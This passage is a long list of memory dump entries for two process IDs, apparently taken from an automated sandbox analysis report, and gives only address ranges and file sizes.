                                                                                                                                                                                                                              • memory/4244-0-0x00007FFBA8E03000-0x00007FFBA8E05000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                              • memory/4900-2300-0x00007FFBA35E0000-0x00007FFBA3955000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                3.5MB

                                                                                                                                                                                                                              • memory/4900-2332-0x00007FFBA2730000-0x00007FFBA274E000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                              • memory/4900-2292-0x00007FFBA3990000-0x00007FFBA39D2000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                264KB

                                                                                                                                                                                                                              • memory/4900-2296-0x00007FFBAF7E0000-0x00007FFBAF7FC000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                112KB

                                                                                                                                                                                                                              • memory/4900-2299-0x00007FFBB19F0000-0x00007FFBB19FB000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                44KB

                                                                                                                                                                                                                              • memory/4900-2298-0x00007FFBA3960000-0x00007FFBA398E000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                184KB

                                                                                                                                                                                                                              • memory/4900-2297-0x00007FFBB37D0000-0x00007FFBB37DB000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                44KB

                                                                                                                                                                                                                              • memory/4900-2294-0x00007FFBB3D70000-0x00007FFBB3D7A000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                              • memory/4900-2304-0x00007FFBA52B0000-0x00007FFBA52BB000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                44KB

                                                                                                                                                                                                                              • memory/4900-2303-0x00007FFBAE130000-0x00007FFBAE13C000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                              • memory/4900-2306-0x00007FFBA3220000-0x00007FFBA322C000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                              • memory/4900-2308-0x00007FFBA3200000-0x00007FFBA320E000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                56KB

                                                                                                                                                                                                                              • memory/4900-2307-0x00007FFBA3210000-0x00007FFBA321D000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                              • memory/4900-2305-0x00007FFBA3520000-0x00007FFBA35D8000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                736KB

                                                                                                                                                                                                                              • memory/4900-2312-0x00007FFBA33D0000-0x00007FFBA34E8000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                              • memory/4900-2314-0x00007FFBA31D0000-0x00007FFBA31DB000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                44KB

                                                                                                                                                                                                                              • memory/4900-2313-0x00007FFBA33B0000-0x00007FFBA33CF000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                124KB

                                                                                                                                                                                                                              • memory/4900-2311-0x00007FFBA31E0000-0x00007FFBA31EC000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                              • memory/4900-2310-0x00007FFBA31F0000-0x00007FFBA31FC000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                              • memory/4900-2309-0x00007FFBA34F0000-0x00007FFBA3517000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                156KB

                                                                                                                                                                                                                              • memory/4900-2302-0x00007FFBA9DD0000-0x00007FFBA9DDC000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                              • memory/4900-2301-0x00007FFBA9EC0000-0x00007FFBA9ECB000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                44KB

                                                                                                                                                                                                                              • memory/4900-2326-0x00007FFBA31A0000-0x00007FFBA31AC000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                              • memory/4900-2328-0x00007FFBA2850000-0x00007FFBA289D000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                308KB

                                                                                                                                                                                                                              • memory/4900-2327-0x00007FFBA30A0000-0x00007FFBA30B8000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                96KB

                                                                                                                                                                                                                              • memory/4900-2330-0x00007FFBA2750000-0x00007FFBA2782000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                200KB

                                                                                                                                                                                                                              • memory/4900-2329-0x00007FFBA3080000-0x00007FFBA3091000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                68KB

                                                                                                                                                                                                                              • memory/4900-2325-0x00007FFBA30C0000-0x00007FFBA30DB000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                108KB

                                                                                                                                                                                                                              • memory/4900-2324-0x00007FFBA30E0000-0x00007FFBA3102000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                              • memory/4900-2323-0x00007FFBA3110000-0x00007FFBA3124000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                              • memory/4900-2322-0x00007FFBA3130000-0x00007FFBA3140000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                              • memory/4900-2321-0x00007FFBA3140000-0x00007FFBA3155000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                84KB

                                                                                                                                                                                                                              • memory/4900-2320-0x00007FFBA3160000-0x00007FFBA316C000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                              • memory/4900-2319-0x00007FFBA3170000-0x00007FFBA3182000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                72KB

                                                                                                                                                                                                                              • memory/4900-2318-0x00007FFBA3190000-0x00007FFBA319D000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                              • memory/4900-2295-0x00007FFBA3230000-0x00007FFBA33A1000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.4MB

                                                                                                                                                                                                                              • memory/4900-2331-0x00007FFBA3200000-0x00007FFBA320E000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                56KB

                                                                                                                                                                                                                              • memory/4900-2317-0x00007FFBA31B0000-0x00007FFBA31BC000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                              • memory/4900-2316-0x00007FFBA31C0000-0x00007FFBA31CB000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                44KB

                                                                                                                                                                                                                              • memory/4900-2315-0x00007FFBA3230000-0x00007FFBA33A1000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.4MB

                                                                                                                                                                                                                              • memory/4900-2293-0x00007FFBA33B0000-0x00007FFBA33CF000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                124KB

                                                                                                                                                                                                                              • memory/4900-2291-0x00007FFBA33D0000-0x00007FFBA34E8000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                              • memory/4900-2289-0x00007FFBB3D60000-0x00007FFBB3D6B000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                44KB

                                                                                                                                                                                                                              • memory/4900-2290-0x00007FFBA34F0000-0x00007FFBA3517000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                156KB

                                                                                                                                                                                                                              • memory/4900-2287-0x00007FFBA3AD0000-0x00007FFBA3AFE000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                184KB

                                                                                                                                                                                                                              • memory/4900-2288-0x00007FFBAF130000-0x00007FFBAF144000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                              • memory/4900-2286-0x00007FFBB8230000-0x00007FFBB823D000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                              • memory/4900-2283-0x00007FFBA35E0000-0x00007FFBA3955000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                3.5MB

                                                                                                                                                                                                                              • memory/4900-2284-0x00007FFBB82A0000-0x00007FFBB82AD000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                              • memory/4900-2285-0x00007FFBA3520000-0x00007FFBA35D8000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                736KB

                                                                                                                                                                                                                              • memory/4900-2282-0x00007FFBB80C0000-0x00007FFBB80D9000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                              • memory/4900-2280-0x00007FFBA3B00000-0x00007FFBA3B34000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                208KB

                                                                                                                                                                                                                              • memory/4900-2281-0x00007FFBA3960000-0x00007FFBA398E000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                184KB

                                                                                                                                                                                                                              • memory/4900-2278-0x00007FFBA3B40000-0x00007FFBA3B6D000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                180KB

                                                                                                                                                                                                                              • memory/4900-2279-0x00007FFBAF7E0000-0x00007FFBAF7FC000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                112KB

                                                                                                                                                                                                                              • memory/4900-2276-0x00007FFBB8350000-0x00007FFBB8369000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                              • memory/4900-2277-0x00007FFBB3D70000-0x00007FFBB3D7A000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                              • memory/4900-2275-0x00007FFBA3990000-0x00007FFBA39D2000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                264KB

                                                                                                                                                                                                                              • memory/4900-2271-0x00007FFBA52C0000-0x00007FFBA52E4000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                144KB

                                                                                                                                                                                                                              • memory/4900-2272-0x00007FFBA39E0000-0x00007FFBA3A0B000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                172KB

                                                                                                                                                                                                                              • memory/4900-2270-0x00007FFBA3A10000-0x00007FFBA3ACC000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                752KB

                                                                                                                                                                                                                              • memory/4900-2269-0x00007FFBA3B70000-0x00007FFBA3FDE000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                4.4MB

                                                                                                                                                                                                                              • memory/4900-2268-0x00007FFBA3AD0000-0x00007FFBA3AFE000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                184KB

                                                                                                                                                                                                                              • memory/4900-2267-0x00007FFBB8230000-0x00007FFBB823D000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                              • memory/4900-2266-0x00007FFBB82A0000-0x00007FFBB82AD000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                              • memory/4900-2265-0x00007FFBB80C0000-0x00007FFBB80D9000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                              • memory/4900-2264-0x00007FFBA3B00000-0x00007FFBA3B34000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                208KB

                                                                                                                                                                                                                              • memory/4900-2263-0x00007FFBA3B40000-0x00007FFBA3B6D000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                180KB

                                                                                                                                                                                                                              • memory/4900-2262-0x00007FFBB8350000-0x00007FFBB8369000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                              • memory/4900-2261-0x00007FFBB87B0000-0x00007FFBB87BF000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                60KB

                                                                                                                                                                                                                              • memory/4900-2260-0x00007FFBA52C0000-0x00007FFBA52E4000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                144KB

                                                                                                                                                                                                                              • memory/4900-2259-0x00007FFBA3B70000-0x00007FFBA3FDE000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                4.4MB